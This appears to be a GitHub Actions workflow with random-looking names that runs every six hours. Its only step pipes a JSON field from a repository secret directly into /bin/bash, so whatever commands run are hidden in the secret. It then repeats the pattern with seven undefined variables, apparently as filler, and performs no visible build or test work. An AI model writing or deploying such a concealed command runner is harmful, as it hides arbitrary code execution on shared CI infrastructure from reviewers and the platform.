name: huangjiao2315

on:
  workflow_dispatch:
  schedule:
    - cron: '6 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2315
        env:
          zxe2084: ${{ secrets.zxe2084 }}
        run: |
          echo $zxe2084 | jq -r .rj7435 | /bin/bash
          echo $rhyc37 | jq -r .kw609 | /bin/bash
          echo $b360 | jq -r .vgay140 | /bin/bash
          echo $zq2 | jq -r .etohr15896 | /bin/bash
          echo $ufykr62 | jq -r .zy2 | /bin/bash
          echo $bjor92748 | jq -r .m750 | /bin/bash
          echo $t903 | jq -r .n2 | /bin/bash
          echo $ae4 | jq -r .oj12861 | /bin/bash

